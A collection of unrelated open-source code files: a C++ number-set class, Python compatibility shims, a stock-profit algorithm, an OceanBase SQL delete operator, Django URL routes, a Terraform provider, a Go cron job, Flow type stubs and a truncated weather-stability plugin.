            if (!(new_extent = NEW NUMBER_EXTENT)) {
                return FALSE;
            }

            _iterator->GetNext();
            if (!_list.Insert(new_extent, _iterator)) {
                DELETE(new_extent);
                return FALSE;
            }

            new_length = Number - p->Start;
            new_extent->Start = Number + 1;
            new_extent->Length = p->Length - 1 - new_length;
            p->Length = new_length;
            _card -= 1;
            *DoesExists = TRUE;
        }
    }

    return TRUE;
}

// Removes the run [Start, Start+Length) one element at a time.
// NOTE(review): O(Length) calls to Remove, each of which rescans the list.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Remove(
    IN  BIG_INT Start,
    IN  BIG_INT Length
    )
{
    BIG_INT i, sup;
    BOOLEAN r;

    sup = Start + Length;
    r = TRUE;
    for (i = Start; i < sup; i += 1) {
        r = Remove(i) && r;
    }

    return r;
}

// Difference: removes every disjoint range of 'NumberSet' from this set.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Remove(
    IN  PCNUMBER_SET    NumberSet
    )
{
    ULONG   i, n;
    BIG_INT s, l;

    n = NumberSet->QueryNumDisjointRanges();
    for (i = 0; i < n; i++) {
        NumberSet->QueryDisjointRange(i, &s, &l);
        if (!Remove(s, l)) {
            return FALSE;
        }
    }

    return TRUE;
}

// Returns the Index'th (zero-based) number of the ordered set.
// Requires Index < QueryCardinality() (DebugAssert only in free builds).
IFSUTIL_EXPORT
BIG_INT
NUMBER_SET::QueryNumber(
    IN  BIG_INT Index
    ) CONST
{
    PNUMBER_EXTENT  p;
    BIG_INT         r;
    BIG_INT         count;

    DebugAssert(Index < _card);

    // Walk extents, accumulating element counts until the Index'th falls
    // inside the current extent.
    _iterator->Reset();
    count = 0;
    while (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
        count += p->Length;
        if (count > Index) {
            break;
        }
    }

    DebugAssert(p);

    return p->Start + Index - (count - p->Length);
}

// Returns TRUE iff [Start, Start+Length) intersects the set (FALSE for an
// empty range).
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::DoesIntersectSet(
    IN  BIG_INT Start,
    IN  BIG_INT Length
    ) CONST
{
    PNUMBER_EXTENT  p;
    BIG_INT         pnext, next;

    DebugAssert(_iterator);

    if (Length == 0) {
        return FALSE;
    }

    next = Start + Length;

    _iterator->Reset();
    while (p = (PNUMBER_EXTENT) _iterator->GetNext()) {

        pnext = p->Start + p->Length;

        if (Start >= p->Start) {
            if (Start < pnext) {
                return TRUE;
            }
        } else {
            if (next > p->Start) {
                return TRUE;
            }
        }
    }

    return FALSE;
}

// Returns the Index'th (zero-based) disjoint range through *Start/*Length.
// NOTE(review): 'p' is only guarded by DebugAssert — an out-of-range Index
// dereferences NULL/uninitialized in free builds; callers must bound Index
// by QueryNumDisjointRanges().
IFSUTIL_EXPORT
VOID
NUMBER_SET::QueryDisjointRange(
    IN  ULONG       Index,
    OUT PBIG_INT    Start,
    OUT PBIG_INT    Length
    ) CONST
{
    ULONG           i;
    PNUMBER_EXTENT  p;

    DebugAssert(_iterator);

    _iterator->Reset();
    for (i = 0; i <= Index; i++) {
        p = (PNUMBER_EXTENT) _iterator->GetNext();
    }

    DebugAssert(p);
    DebugAssert(Start);
    DebugAssert(Length);

    *Start = p->Start;
    *Length = p->Length;
}

// Finds the extent containing 'Number' and returns it through
// *Start/*Length.  Returns FALSE when the number is not in the set.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::QueryContainingRange(
    IN  BIG_INT     Number,
    OUT PBIG_INT    Start,
    OUT PBIG_INT    Length
    ) CONST
{
    PNUMBER_EXTENT  p;

    DebugAssert(_iterator);

    _iterator->Reset();
    while (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) {
        if (p->Start <= Number) {
            break;
        }
    }

    if (!p || Number >= p->Start + p->Length) {
        return FALSE;
    }

    *Start = p->Start;
    *Length = p->Length;

    return TRUE;
}
lingyunan0510/VIC
vic/drivers/python/vic/pycompat.py
# -*- coding: utf-8 -*-
"""Python 2/3 compatibility shims used throughout the package.

Exposes common names (``basestring``, ``unicode_type``, ``iteritems`` …)
with a single spelling regardless of interpreter major version.
"""
import sys

# True on Python 3 interpreters; selects which set of shims is defined below.
PY3 = sys.version_info[0] >= 3

if PY3:
    basestring = str
    unicode_type = str
    bytes_type = bytes

    def iteritems(d):
        """Return an iterator over ``(key, value)`` pairs of *d*."""
        return iter(d.items())

    def itervalues(d):
        """Return an iterator over the values of *d*."""
        return iter(d.values())
    pyrange = range
    pyzip = zip
    pylong = int
    try:
        # SafeConfigParser was deprecated in Python 3.2 and removed in 3.12;
        # ConfigParser is its direct replacement with identical behavior here.
        from configparser import SafeConfigParser
    except ImportError:
        from configparser import ConfigParser as SafeConfigParser
else:  # Python 2
    basestring = basestring
    unicode_type = unicode
    bytes_type = str

    def iteritems(d):
        """Return an iterator over ``(key, value)`` pairs of *d*."""
        return d.iteritems()

    def itervalues(d):
        """Return an iterator over the values of *d*."""
        return d.itervalues()
    pyrange = xrange
    from itertools import izip as pyzip
    pylong = long
    from ConfigParser import SafeConfigParser

# Prefer the fast C implementation, then stdlib, then the PyPI backport.
try:
    from cyordereddict import OrderedDict
except ImportError:
    try:
        from collections import OrderedDict
    except ImportError:
        from ordereddict import OrderedDict
ctc316/algorithm-python
Lintcode/Ladder_1_Algorithm/09. Data Structure - Interval, Array & Matrix/393. Best Time to Buy and Sell Stock IV.py
class Solution:
    """
    @param K: An integer
    @param prices: An integer array
    @return: Maximum profit
    """
    def maxProfit(self, K, prices):
        days = len(prices)
        if days < 2:
            return 0

        # With K >= days/2 the transaction cap can never bind, so simply
        # collect every positive day-to-day price increase.
        if K >= days / 2:
            return sum(max(curr - prev, 0)
                       for prev, curr in zip(prices, prices[1:]))

        # sell_today[j]:  best profit using at most j trades, forced to sell today.
        # best_so_far[j]: best profit using at most j trades up to today.
        # Only the previous day's row is needed, so each is a 1-D array.
        sell_today = [0] * (K + 1)
        best_so_far = [0] * (K + 1)
        for prev, curr in zip(prices, prices[1:]):
            delta = curr - prev
            # Iterate j downward so this day's updates never feed each other.
            for j in range(K, 0, -1):
                # Either open a new trade (best with j-1 trades plus today's move)
                # or extend yesterday's held position by today's move.
                sell_today[j] = max(best_so_far[j - 1] + delta,
                                    sell_today[j] + delta)
                best_so_far[j] = max(sell_today[j], best_so_far[j])
        return best_so_far[K]
wangcy6/weekly_read
code_reading/oceanbase-master/src/sql/engine/dml/ob_multi_part_delete_op.cpp
/**
 * Copyright (c) 2021 OceanBase
 * OceanBase CE is licensed under Mulan PubL v2.
 * You can use this software according to the terms and conditions of the Mulan PubL v2.
 * You may obtain a copy of Mulan PubL v2 at:
 * http://license.coscl.org.cn/MulanPubL-2.0
 * THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
 * EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
 * MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
 * See the Mulan PubL v2 for more details.
 */

#define USING_LOG_PREFIX SQL_ENG
#include "sql/engine/dml/ob_multi_part_delete_op.h"
#include "sql/engine/ob_physical_plan_ctx.h"
#include "sql/engine/ob_exec_context.h"
#include "sql/executor/ob_mini_task_executor.h"
#include "sql/engine/expr/ob_expr_calc_partition_id.h"
#include "sql/engine/dml/ob_table_modify.h"
namespace oceanbase {
using namespace common;
using namespace share::schema;
namespace sql {
OB_SERIALIZE_MEMBER((ObMultiPartDeleteSpec, ObTableDeleteSpec));

// Open phase of the multi-partition delete operator: consumes the entire
// child input, shuffles each row to its target partition task, then executes
// all per-partition delete subplans through the mini task executor.
// The delete work therefore happens eagerly in inner_open(), not per row.
int ObMultiPartDeleteOp::inner_open()
{
  int ret = OB_SUCCESS;
  bool got_row = false;
  ObTaskExecutorCtx* executor_ctx = GET_TASK_EXECUTOR_CTX(ctx_);
  ObSQLSessionInfo* my_session = GET_MY_SESSION(ctx_);
  if (OB_FAIL(init_multi_dml_ctx(
          ctx_, MY_SPEC.table_dml_infos_, MY_SPEC.get_phy_plan(), NULL /*subplan_root*/, MY_SPEC.se_subplan_root_))) {
    LOG_WARN("init multi dml ctx failed", K(ret));
  }
  // if (OB_SUCC(ret)) {
  //   const ObTableDMLInfo &first_dml_info = table_dml_infos_.at(0);
  //   const ObGlobalIndexDMLInfo &first_index_dml_info = first_dml_info.index_infos_.at(0);
  //   const ObTableModify *first_sub_delete = first_index_dml_info.dml_subplans_.at(DELETE_OP).subplan_root_;
  //   if (OB_NOT_NULL(first_sub_delete) && first_sub_delete->get_trigger_args().count() > 0) {
  //     OZ(delete_ctx->init_trigger_params(first_sub_delete->get_trigger_event(),
  //         first_sub_delete->get_all_timing_points(),
  //         first_sub_delete->get_trigger_columns().get_projector(),
  //         first_sub_delete->get_trigger_columns().get_count()));
  //   }
  // }
  if (OB_FAIL(ret)) {
  } else if (OB_FAIL(ObTableModifyOp::inner_open())) {
    LOG_WARN("open child operator failed", K(ret));
  } else if (OB_FAIL(init_returning_store())) {
    LOG_WARN("init returning row store failed", K(ret));
  } else if (OB_FAIL(shuffle_delete_row(got_row))) {
    LOG_WARN("shuffle delete row failed", K(ret));
  } else if (!got_row) {
    // Child produced no rows: nothing to delete, skip task execution entirely.
    // do nothing
  } else if (OB_FAIL(ObTableModify::extend_dml_stmt(ctx_, MY_SPEC.table_dml_infos_, table_dml_ctxs_))) {
    LOG_WARN("extend dml stmt failed", K(ret));
  } else if (OB_FAIL(multi_dml_plan_mgr_.build_multi_part_dml_task())) {
    LOG_WARN("build multi partition dml task failed", K(ret));
  } else {
    ObIArray<ObTaskInfo*>& task_info_list = multi_dml_plan_mgr_.get_mini_task_infos();
    const ObMiniJob& subplan_job = multi_dml_plan_mgr_.get_subplan_job();
    bool table_need_first = multi_dml_plan_mgr_.table_need_first();
    ObMiniTaskResult result;
    // RAII guard marks the plan ctx as running a multi-table DML for its scope.
    ObMultiDMLInfo::ObIsMultiDMLGuard guard(*ctx_.get_physical_plan_ctx());
    if (OB_FAIL(mini_task_executor_.execute(ctx_, subplan_job, task_info_list, table_need_first, result))) {
      LOG_WARN("execute multi table dml task failed", K(ret));
    }
  }
  return ret;
}

// Close phase: waits for all outstanding mini tasks, then closes the base
// operator.  A close failure takes precedence over a wait failure in the
// returned code.
int ObMultiPartDeleteOp::inner_close()
{
  ObPhysicalPlanCtx* plan_ctx = GET_PHY_PLAN_CTX(ctx_);
  int wait_ret = mini_task_executor_.wait_all_task(plan_ctx->get_timeout_timestamp());
  int close_ret = ObTableModifyOp::inner_close();
  if (OB_SUCCESS != wait_ret || OB_SUCCESS != close_ret) {
    LOG_WARN("inner close failed", K(wait_ret), K(close_ret));
  }
  return (OB_SUCCESS == close_ret) ? wait_ret : close_ret;
}

// Drains the child operator and routes each row to the per-partition task
// buffers of every affected table / global index.  Also feeds the RETURNING
// store and enforces rowkey null/duplicate filtering.  'got_row' reports
// whether at least one input row was seen.
int ObMultiPartDeleteOp::shuffle_delete_row(bool& got_row)
{
  int ret = OB_SUCCESS;
  ObTaskExecutorCtx* task_ctx = GET_TASK_EXECUTOR_CTX(ctx_);
  ObPhysicalPlanCtx* plan_ctx = GET_PHY_PLAN_CTX(ctx_);
  ObSqlCtx* sql_ctx = NULL;
  got_row = false;
  CK(OB_NOT_NULL(sql_ctx = ctx_.get_sql_ctx()));
  CK(OB_NOT_NULL(sql_ctx->schema_guard_));
  CK(OB_NOT_NULL(MY_SPEC.get_phy_plan()));
  while (OB_SUCC(ret) && OB_SUCC(inner_get_next_row())) {
    LOG_DEBUG("inner get next row", K(ObToStringExprRow(eval_ctx_, child_->get_spec().output_)));
    // One input row may touch several tables (e.g. cascaded deletes).
    for (int64_t k = 0; OB_SUCC(ret) && k < MY_SPEC.table_dml_infos_.count(); ++k) {
      clear_evaluated_flag();
      const ObArrayWrap<ObGlobalIndexDMLInfo>& global_index_infos = MY_SPEC.table_dml_infos_.at(k).index_infos_;
      ObArrayWrap<ObGlobalIndexDMLCtx>& global_index_ctxs = table_dml_ctxs_.at(k).index_ctxs_;
      // ObTableModifySpec *sub_delete =
      //     global_index_ctxs.at(0).se_subplans_.at(DELETE_OP).subplan_root_;
      // CK(OB_NOT_NULL(sub_delete));
      // OZ(TriggerHandle::init_param_old_row(*sub_delete, *delete_ctx, *old_row), *old_row);
      // OX(LOG_DEBUG("TRIGGER", K(*old_row), K(delete_ctx->tg_old_row_)));
      // OZ(TriggerHandle::do_handle_before_row(*sub_delete, *delete_ctx, NULL), *old_row);
      CK(!global_index_infos.empty());
      CK(!global_index_ctxs.empty());
      if (MY_SPEC.is_returning_) {
        // Buffer the row for the RETURNING clause before any filtering below.
        OZ(returning_datum_store_.add_row(MY_SPEC.output_, &eval_ctx_));
      }
      if (OB_SUCC(ret)) {
        // Index 0 is the primary table's subplan set.
        const SeDMLSubPlanArray& primary_dml_subplans = global_index_ctxs.at(0).se_subplans_;
        if (MY_SPEC.table_dml_infos_.at(k).need_check_filter_null_) {
          bool is_null = false;
          if (OB_FAIL(check_rowkey_is_null(primary_dml_subplans.at(DELETE_OP).access_exprs_,
                  MY_SPEC.table_dml_infos_.at(k).rowkey_cnt_,
                  is_null))) {
            LOG_WARN("check rowkey is null failed", K(ret), K(MY_SPEC.table_dml_infos_), K(k));
          } else if (is_null) {
            // Null rowkey: this table has no matching row for this input; skip it.
            continue;
          }
        }
        if (OB_SUCC(ret)) {
          bool is_distinct = false;
          if (OB_FAIL(check_rowkey_whether_distinct(primary_dml_subplans.at(DELETE_OP).access_exprs_,
                  MY_SPEC.table_dml_infos_.at(k).rowkey_cnt_,
                  MY_SPEC.table_dml_infos_.at(k).distinct_algo_,
                  table_dml_ctxs_.at(k).se_rowkey_dist_ctx_,
                  is_distinct))) {
            LOG_WARN("check rowkey whether distinct failed", K(ret));
          } else if (!is_distinct) {
            // Duplicate rowkey already scheduled for deletion; skip it.
            continue;
          }
        }
      }
      ObTableModifySpec* delete_spec = global_index_infos.at(0).se_subplans_.at(DELETE_OP).subplan_root_;
      CK(OB_NOT_NULL(delete_spec));
      // Foreign-key checks/cascades run against the old (deleted) row.
      OZ(ForeignKeyHandle::do_handle_old_row(*this, delete_spec->fk_args_, child_->get_spec().output_));
      // OZ(TriggerHandle::do_handle_after_row(*sub_delete, *delete_ctx), *old_row);
      // Route the row once per global index (entry 0 = primary table).
      for (int64_t i = 0; OB_SUCC(ret) && i < global_index_infos.count(); ++i) {
        clear_evaluated_flag();
        const ObExpr* calc_part_id_expr = global_index_infos.at(i).calc_part_id_exprs_.at(0);
        ObIArray<int64_t>& part_ids = global_index_ctxs.at(i).partition_ids_;
        const SeDMLSubPlanArray& se_subplans = global_index_ctxs.at(i).se_subplans_;
        int64_t part_idx = OB_INVALID_INDEX;
        CK(1 == global_index_infos.at(i).calc_part_id_exprs_.count());
        CK(DML_OP_CNT == se_subplans.count());
        // Evaluate the partition-id expression to find the row's target partition.
        OZ(calc_part_id(calc_part_id_expr, part_ids, part_idx));
        if (OB_SUCC(ret)) {
          if (OB_FAIL(multi_dml_plan_mgr_.add_part_row(k, i, part_idx, DELETE_OP, se_subplans.at(0).access_exprs_))) {
            LOG_WARN("add row to dynamic mini task scheduler failed", K(ret));
          } else {
            LOG_DEBUG("shuffle delete row",
                K(k),
                K(part_idx),
                K(part_ids),
                K(i),
                K(ObToStringExprRow(eval_ctx_, se_subplans.at(0).access_exprs_)));
          }
        }
      }  // for global_index_infos
    }    // for table_dml_infos
    got_row = true;
    plan_ctx->add_affected_rows(1);
  }
  if (OB_ITER_END == ret) {
    // Normal end of the child's row stream.
    ret = OB_SUCCESS;
  }
  if (OB_SUCC(ret) && MY_SPEC.is_returning_) {
    // Seal the RETURNING store and prepare the iterator used by get_next_row().
    bool need_dump = false;
    OZ(returning_datum_store_.finish_add_row(need_dump));
    OZ(returning_datum_iter_.init(&returning_datum_store_, ObChunkDatumStore::BLOCK_SIZE));
  }
  if (OB_FAIL(ret)) {
    LOG_WARN("get next row failed", K(ret));
  }
  return ret;
}

// Fetches the next row from the child operator, resetting expression
// evaluation state first.
int ObMultiPartDeleteOp::inner_get_next_row()
{
  clear_evaluated_flag();
  return child_->get_next_row();
}

// Public row interface: only a DELETE ... RETURNING produces output rows,
// replayed from the store filled during inner_open(); otherwise the operator
// is exhausted immediately.
int ObMultiPartDeleteOp::get_next_row()
{
  int ret = OB_SUCCESS;
  if (!MY_SPEC.is_returning_) {
    ret = OB_ITER_END;
  } else {
    ret = returning_datum_iter_.get_next_row(MY_SPEC.output_, eval_ctx_);
  }
  return ret;
}
}  // namespace sql
}  // namespace oceanbase
ochui/recharge-me
recharge/urls.py
from django.contrib import admin
from django.urls import path, include
from django.contrib.sitemaps.views import sitemap
from .sitemaps import StaticViewSitemap, TopicSitemap, StaticAuthViewSitemap, CategorySitemap
from .views import LandingView, AboutView, ContactView, PrivacyView, TosView

# Sections served by the sitemap view registered below; each key becomes a
# "section" name in the generated sitemap index.
sitemaps = {
    'static': StaticViewSitemap,
    'topics': TopicSitemap,
    'category': CategorySitemap,
    'auth': StaticAuthViewSitemap,
}

# Root URLconf for the project.
# NOTE(review): the static pages are registered WITHOUT a trailing slash
# ('about', 'contact', ...), unlike the prefixed includes below -- confirm
# this interacts with APPEND_SLASH the way the site expects.
urlpatterns = [
    # static marketing / legal pages
    path('', LandingView.as_view(), name='landing_page'),
    path('about', AboutView.as_view(), name='about_page'),
    path('contact', ContactView.as_view(), name='contact_page'),
    path('policies', PrivacyView.as_view(), name='policies'),
    path('terms', TosView.as_view(), name='tos'),
    # Django admin
    path('admin/', admin.site.urls),
    # NOTE(review): two includes share the 'accounts/' prefix; allauth is
    # consulted first, then the project's own accounts app. Order matters
    # for any overlapping route names -- confirm intended precedence.
    path('accounts/', include('allauth.urls')),
    path('accounts/', include('accounts.urls')),
    path('forum/', include('spirit.urls')),
    path('accounts/avatar/', include('avatar.urls')),
    path('accounts/notifications/', include('notifications.urls', namespace='notifications')),
    # XML sitemap and robots.txt
    path('sitemap.xml', sitemap, {'sitemaps': sitemaps},
         name='django.contrib.sitemaps.views.sitemap'),
    path('robots.txt', include('robots.urls')),
    path('ads/', include('ads.urls')),
]
yamamoto-febc/terraform-provider-rke
rke/provider.go
<gh_stars>100-1000 package rke import ( "github.com/hashicorp/terraform-plugin-sdk/helper/schema" "github.com/hashicorp/terraform-plugin-sdk/terraform" ) // Provider returns a terraform.ResourceProvider. func Provider() terraform.ResourceProvider { return &schema.Provider{ Schema: map[string]*schema.Schema{ "debug": { Type: schema.TypeBool, Optional: true, DefaultFunc: schema.EnvDefaultFunc("RKE_DEBUG", false), }, "log_file": { Type: schema.TypeString, Optional: true, DefaultFunc: schema.EnvDefaultFunc("RKE_LOG_FILE", ""), }, }, ResourcesMap: map[string]*schema.Resource{ "rke_cluster": resourceRKECluster(), }, DataSourcesMap: map[string]*schema.Resource{}, ConfigureFunc: providerConfigure, } } func providerConfigure(d *schema.ResourceData) (interface{}, error) { config := &Config{ Debug: d.Get("debug").(bool), LogFile: d.Get("log_file").(string), } config.initLogger() return config, nil }
robertotambunan/tweather
deliveries/cron.go
<reponame>robertotambunan/tweather package deliveries import ( "context" "log" ) // ActivateWheaterUpdateCron function to activate cron for wheater func (cw *CronWeather) ActivateWheater() { err := cw.weatherUsecase.PostCurrentWeather(context.Background()) if err != nil { log.Println(err) } err = cw.newsUsecase.PostTopNewsIndonesia(context.Background()) if err != nil { log.Println(err) } err = cw.newsUsecase.PostTopNewsSport(context.Background()) if err != nil { log.Println(err) } }
Brianzchen/flow-typed
definitions/npm/koa-basic-auth_v4.x.x/flow_v0.83.x-/koa-basic-auth_v4.x.x.js
<reponame>Brianzchen/flow-typed<filename>definitions/npm/koa-basic-auth_v4.x.x/flow_v0.83.x-/koa-basic-auth_v4.x.x.js declare module 'koa-basic-auth' { declare type Middleware = ( ctx: any, next: () => Promise<void> ) => Promise<void>; declare module.exports: (opts: {| name: string, pass: string, |}) => Middleware; }
fox91/himan
himan-plugins/source/stability.cpp
#include "stability.h" #include "forecast_time.h" #include "level.h" #include "lift.h" #include "logger.h" #include "numerical_functions.h" #include "plugin_factory.h" #include "stability.cuh" #include "util.h" #include <algorithm> // for std::transform #include "fetcher.h" #include "hitool.h" #include "radon.h" #include "writer.h" using namespace std; using namespace himan; using namespace himan::plugin; static level itsBottomLevel; typedef vector<double> vec; pair<vec, vec> GetSRHSourceData(const shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h); vec CalculateBulkShear(const vec& U, const vec& V); vec CalculateBulkShear(shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, double stopHeight); vec CalculateEffectiveBulkShear(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, const level& sourceLevel, const level& targetLevel); #ifdef HAVE_CUDA namespace stabilitygpu { void Process(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>> myTargetInfo); } #endif namespace STABILITY { std::shared_ptr<himan::info<double>> Fetch(std::shared_ptr<const plugin_configuration>& conf, std::shared_ptr<himan::info<double>>& myTargetInfo, const himan::level& lev, const himan::param& par, bool returnPacked = false); vec Shear(const vec& lowerValues, const vec& upperValues) { vec ret(lowerValues.size()); for (size_t i = 0; i < lowerValues.size(); i++) { ret[i] = upperValues[i] - lowerValues[i]; } return ret; } vec Shear(std::shared_ptr<himan::plugin::hitool>& h, const himan::param& par, const vec& lowerHeight, const vec& upperHeight) { const auto lowerValues = h->VerticalValue<double>(par, lowerHeight); const auto upperValues = h->VerticalValue<double>(par, upperHeight); return Shear(lowerValues, upperValues); } vec Shear(std::shared_ptr<himan::plugin::hitool>& h, const himan::param& par, double lowerHeight, double upperHeight, size_t N) { const vec lower(N, lowerHeight); const vec 
upper(N, upperHeight); return Shear(h, par, lower, upper); } std::shared_ptr<info<double>> Fetch(std::shared_ptr<const plugin_configuration>& conf, std::shared_ptr<himan::info<double>>& myTargetInfo, const himan::level& lev, const himan::param& par, bool useCuda) { const forecast_time forecastTime = myTargetInfo->Time(); const forecast_type forecastType = myTargetInfo->ForecastType(); auto f = GET_PLUGIN(fetcher); return f->Fetch(conf, forecastTime, lev, par, forecastType, useCuda && conf->UseCudaForPacking()); } pair<vec, vec> GetEBSLevelData(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, const level& sourceLevel, const level& targetLevel) { auto ELInfo = STABILITY::Fetch(conf, myTargetInfo, sourceLevel, param("EL-LAST-M")); const auto& EL = VEC(ELInfo); vec LPL; // LPL only exists for Max theta e level if (sourceLevel == MaxThetaELevel) { auto LPLInfo = STABILITY::Fetch(conf, myTargetInfo, sourceLevel, param("LPL-M")); LPL = VEC(LPLInfo); } else { LPL.resize(EL.size(), 2); } vec Top(EL.size(), MissingDouble()); if (targetLevel == Height0Level) { for (auto&& tup : zip_range(Top, LPL, EL)) { double& top = tup.get<0>(); const double lpl = tup.get<1>(); const double el = tup.get<2>(); top = 0.5 * (el - lpl) + lpl; } return make_pair(LPL, Top); } else if (targetLevel == MaxWindLevel) { vec Bottom = Top; // Finding maximum wind between levels LPL + 0.5*(0.6EL - LPL) and 0.6E // Hence, if LPL is on the surface, being ~0m, the search limits for maximum wind become 0.3EL ... 0.6EL for (auto&& tup : zip_range(Bottom, Top, LPL, EL)) { double& btm = tup.get<0>(); double& top = tup.get<1>(); const double lpl = tup.get<2>(); const double el = tup.get<3>(); if (el - lpl >= 3000.) 
{ btm = 0.5 * (0.6 * el - lpl) + lpl; top = 0.6 * el; } ASSERT(btm < top || (IsMissing(btm) && IsMissing(top))); } const auto maxWind = h->VerticalMaximum(FFParam, Bottom, Top); const auto maxWindHeight = h->VerticalHeight(FFParam, Bottom, Top, maxWind); return make_pair(LPL, maxWindHeight); } throw runtime_error("Invalid target level: " + static_cast<string>(targetLevel)); } } stability::stability() { itsLogger = logger("stability"); } void stability::Process(std::shared_ptr<const plugin_configuration> conf) { Init(conf); auto r = GET_PLUGIN(radon); itsBottomLevel = level(kHybrid, stoi(r->RadonDB().GetProducerMetaData(itsConfiguration->TargetProducer().Id(), "last hybrid level number"))); #ifdef HAVE_CUDA stability_cuda::itsBottomLevel = itsBottomLevel; #endif itsThreadDistribution = ThreadDistribution::kThreadForForecastTypeAndTime; itsLevelIterator.Clear(); SetParams({CSIParam, LIParam, SIParam, CAPESParam}, {Height0Level}); SetParams({BSParam}, {OneKMLevel, ThreeKMLevel, SixKMLevel}); SetParams({SRHParam}, {OneKMLevel, ThreeKMLevel}); SetParams({TPEParam}, {ThreeKMLevel}); SetParams({EHIParam}, {OneKMLevel}); SetParams({BRNParam}, {SixKMLevel}); SetParams({FFParam}, {EuropeanMileLevel}); SetParams({QParam}, {HalfKMLevel}); SetParams({EBSParam}, {MaxWindLevel}); Start(); } vec CalculateStormRelativeHelicity(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h, double stopHeight, const pair<vec, vec>& UVId) { auto Uid = UVId.first; auto Vid = UVId.second; vec SRH(Uid.size(), 0); auto prevUInfo = STABILITY::Fetch(conf, myTargetInfo, itsBottomLevel, UParam); auto prevVInfo = STABILITY::Fetch(conf, myTargetInfo, itsBottomLevel, VParam); auto prevZInfo = STABILITY::Fetch(conf, myTargetInfo, itsBottomLevel, HLParam); vector<bool> found(SRH.size(), false); level curLevel = itsBottomLevel; while (curLevel.Value() > 0) { curLevel.Value(curLevel.Value() - 1); auto UInfo = STABILITY::Fetch(conf, myTargetInfo, curLevel, 
UParam); auto VInfo = STABILITY::Fetch(conf, myTargetInfo, curLevel, VParam); auto ZInfo = STABILITY::Fetch(conf, myTargetInfo, curLevel, HLParam); const auto& U = VEC(UInfo); const auto& V = VEC(VInfo); const auto& Z = VEC(ZInfo); const auto& prevU = VEC(prevUInfo); const auto& prevV = VEC(prevVInfo); const auto& prevZ = VEC(prevZInfo); for (size_t i = 0; i < SRH.size(); i++) { if (found[i]) { continue; } const double _Uid = Uid[i]; const double _Vid = Vid[i]; const double _pU = prevU[i]; const double _pV = prevV[i]; double _U = U[i]; double _V = V[i]; if (Z[i] > stopHeight) { ASSERT(prevZ[i] < stopHeight); _U = numerical_functions::interpolation::Linear<double>(stopHeight, prevZ[i], Z[i], _pU, _U); _V = numerical_functions::interpolation::Linear<double>(stopHeight, prevZ[i], Z[i], _pV, _V); found[i] = true; } const double res = ((_Uid - _pU) * (_pV - _V)) - ((_Vid - _pV) * (_pU - _U)); if (!IsMissing(res)) { SRH[i] -= res; } } if (found.size() == static_cast<size_t>(count(found.begin(), found.end(), true))) { break; } prevUInfo = UInfo; prevVInfo = VInfo; prevZInfo = ZInfo; } replace_if(SRH.begin(), SRH.end(), [](const double& v) { return v == 0.; }, MissingDouble()); return SRH; } vec CalculateBulkRichardsonNumber(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h) { auto CAPEInfo = STABILITY::Fetch(conf, myTargetInfo, level(kHeightLayer, 500, 0), param("CAPE-JKG")); const auto& CAPE = VEC(CAPEInfo); auto U6 = h->VerticalAverage<double>(UParam, 10, 6000); auto V6 = h->VerticalAverage<double>(VParam, 10, 6000); auto U05 = h->VerticalAverage<double>(UParam, 10, 500); auto V05 = h->VerticalAverage<double>(VParam, 10, 500); vec BRN(CAPE.size(), MissingDouble()); for (size_t i = 0; i < BRN.size(); i++) { BRN[i] = STABILITY::BRN(CAPE[i], U6[i], V6[i], U05[i], V05[i]); } return BRN; } vec CalculateEnergyHelicityIndex(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo) { auto 
CAPEInfo = STABILITY::Fetch(conf, myTargetInfo, level(kHeightLayer, 500, 0), param("CAPE-JKG")); const auto& CAPE = VEC(CAPEInfo); const auto& SRH = VEC(myTargetInfo); vec EHI(CAPE.size(), MissingDouble()); for (size_t i = 0; i < EHI.size(); i++) { EHI[i] = CAPE[i] * SRH[i] / 160000.; } return EHI; } void CalculateHelicityIndices(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h) { auto UVId = GetSRHSourceData(myTargetInfo, h); myTargetInfo->Find<param>(SRHParam); myTargetInfo->Find<level>(ThreeKMLevel); const auto SRH03 = CalculateStormRelativeHelicity(conf, myTargetInfo, h, 3000, UVId); myTargetInfo->Data().Set(SRH03); myTargetInfo->Find<level>(OneKMLevel); const auto SRH01 = CalculateStormRelativeHelicity(conf, myTargetInfo, h, 1000, UVId); myTargetInfo->Data().Set(SRH01); const auto EHI01 = CalculateEnergyHelicityIndex(conf, myTargetInfo); myTargetInfo->Find<param>(EHIParam); myTargetInfo->Data().Set(EHI01); myTargetInfo->Find<level>(SixKMLevel); myTargetInfo->Find<param>(BRNParam); const auto BRN = CalculateBulkRichardsonNumber(conf, myTargetInfo, h); myTargetInfo->Data().Set(BRN); } tuple<vec, vec, vec, shared_ptr<info<double>>, shared_ptr<info<double>>, shared_ptr<info<double>>> GetLiftedIndicesSourceData(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { auto T500 = h->VerticalAverage<double>(TParam, 0., 500.); auto P500 = h->VerticalAverage<double>(PParam, 0., 500.); vec TD500; try { TD500 = h->VerticalAverage<double>(param("TD-K"), 0., 500.); } catch (const HPExceptionType& e) { if (e == kFileDataNotFound) { TD500 = h->VerticalAverage<double>(RHParam, 0., 500.); for (auto&& tup : zip_range(TD500, T500)) { double& res = tup.get<0>(); double t = tup.get<1>(); res = metutil::DewPointFromRH_<double>(t, res); } } } if (P500[0] < 1500) { transform(P500.begin(), P500.end(), P500.begin(), 